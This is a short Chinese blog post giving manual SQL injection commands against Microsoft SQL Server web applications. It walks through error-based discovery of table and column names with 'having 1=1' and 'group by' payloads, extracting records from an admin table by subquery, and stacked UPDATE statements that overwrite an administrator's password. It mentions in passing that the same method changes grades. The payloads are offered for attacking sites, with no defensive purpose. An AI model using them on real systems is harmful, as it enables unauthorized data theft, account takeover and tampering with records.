SpookZanG

手工注入常用命令

我这里就说MSSQL的 ，因为ACCESS的工具满大街都是，而MSSQL，有时工具跟手工检测的不一样。

还是相信自己的眼睛把。

在链接后提交 ‘having 1=1–  来爆出表和列。

假如返回

Microsoft OLE DB Provider for SQL Server 错误 ’80040e14′
Column ‘newsinfo.NewsID’ is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

newsinfo.NewsID  这个就是表和列。

然后再提交 ‘ group by newsinfo.NewsID having 1=1–

在爆下一个。

（这里说一下，所谓的爆出，其实就是把我们想看的东东通过 报错 的形式显示出来。）

一直爆到显示正常为止。

‘and (select top 1 列名 from 表名 where id=X)>1
X代表第X个数据。

如我们知道他的列名为: name  表名为 admin

我们提交 ‘and (select top 1 name from admin where id=1)>1

我们就能知道admin这个表中第一个数据的名字了。

如果我们知道了经过MD5加密过的密码，而且破不出来，我们可以用updata语句。（改成绩也是用的他）

‘;update 表名 set 列名=’内容’ where id=’X’

如 ‘;update admin set password=’spookzang’ where id=’1′

我们就能把admin这个表中的第一条数据的密码改成 spookzang了。

大概就是这些了。以后想起什么在写。

最后希望本文能给你一些帮助。